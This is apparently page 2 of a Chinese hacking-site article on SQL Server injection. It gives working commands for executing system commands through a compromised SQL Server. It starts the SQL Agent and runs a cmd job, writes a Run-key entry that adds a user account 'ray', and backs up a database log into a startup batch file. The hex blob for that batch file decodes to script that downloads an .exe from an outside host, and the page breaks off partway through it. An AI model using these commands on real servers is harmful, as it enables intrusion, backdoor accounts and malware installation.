SQL Server防御及注入

• 　　

  　　除开这些，还可以利用SQL代理执行命令，当然必须先开启SQL代理服务，默认情况下这个服务是关闭的.我们可以先利用xp_servicecontrol开启SQLSERVERAGENT，然后建立个SQL计划任务，然后马上运行这个任务。

  　　exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

  　　use msdb exec sp_delete_job null,'x'

  　　exec sp_add_job 'x'

  　　exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c Dir C:\'

  　　exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'

  　　二、写任意文件执行命令

  　　利用xp_regwrite写注册表项，直接把要执行的命令写入RUN启动项。

  　　EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user ray ray /add'

  　　

  　　备份日志到启动项

  　　我们可以开启一个数据库的完全恢复模式，然后新建个表，插入要备份进日志的命令，最后把日志备份成批处理文件到用户启动文件夹，机器重新启动后就会运行这个文件。

  　　alter database msdb set RECOVERY FULL--

  　　create table cmd (a image)--

  　　backup log msdb to disk = 'c:\cmd1' with init--

  　　insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E63

  6E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D2229

• 上一页 [1] [2] [3] [4] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• SQL Server防御及注入 相关文章：
• ·节哀顺便病毒感染安全软件致防御失效
• ·怎么样清除能突破主动防御的新型木马
• ·谈谈跨站脚本攻击与防御技巧
• ·完全防御DDoS攻击的实时监测模型
• ·拒绝服务攻击防御全攻略
• ·SQL Server防御及注入
• ·瑞星杀毒2008主动防御的详细设置
• ·金山毒霸2008主推“三维网络防御体系”
• ·360度防御：诺顿360用户体验报告
• ·木马病毒绕过主动防御直接刺穿卡巴斯基
• SQL Server防御及注入 相关软件
• ·3D防御战2
• ·高皇帝御制文集
• ·防御之王
• ·领导通御指导手册
• ·Autorun病毒防御V2.0 Beta 2
• ·妖皇之煌——百妖御
• ·御魔尊者
• ·御美情缘
• ·御天者
• ·御月传说

上一篇:防止被杀毒软件误删的代码

下一篇:恢复被误删除的Linux文件

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐